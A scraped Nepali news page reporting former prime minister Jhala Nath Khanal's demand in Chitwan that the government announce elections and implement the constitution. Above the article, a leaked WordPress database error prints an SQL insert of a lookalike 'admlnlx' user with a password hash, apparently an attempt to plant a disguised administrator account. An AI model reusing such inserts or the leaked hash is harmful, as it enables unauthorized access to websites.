WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BFbaZiDeP6nCrXqGhNaMbe9vX3MOs70', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 03:57:47', '', 'admlnlx', 'admlnlx')
चितवन, माघ २२–
पूर्व प्रधानमन्त्री एवंम नेकपा एमालेका नेता झलनाथ खनालले निर्वाचन घोषणा र संविधान कार्यान्वयन गराउन नसके वर्तमान सरकारको कुनै औचित्य नरहेको बताउनुभएको छ ।
चितवनको भरतपुर विमानस्थलमा आज अपरान्ह प्रेस चौतारी चितवनले गरेको पत्रकार भेटघाटमा बोल्दै नेता खनालले निर्वाचन मिति घोषणा र संविधान कार्यान्वयनमा अविलम्ब लाग्न सरकारलाई आग्रह गर्नुभयो । उहाँले भन्नुभयो–“निर्वाचन घोषणा, लोकतन्त्रको रक्षा, संविधान कार्यान्वयन गराउन सरकार सक्दैन भने वर्तमान सरकारको कुनै औचित्य छैन् ।”
नेता नेपालले जनभावना विपरीत सरकारले काम गर्न खोजे कुनै पनि बेला सरकार छोड्नुपर्ने अवस्था आउने चेतावनी दिनुभयो । उहाँले नेकपा एमालेले आवश्यकता अनुसार जनदवाब तथा आधिबेरी ल्याउने चेतावनी दिनुभयो । उहाँले देशलाई समृद्धि तर्फ अघि बढाउन तत्काल निर्वाचनको घोषणा गर्न माग समेत गर्नुभयो ।
नेता खनाल माडीमा आयोजित एक कार्यक्रममा सहभागि हुन चितवन आउनुभएको हो ।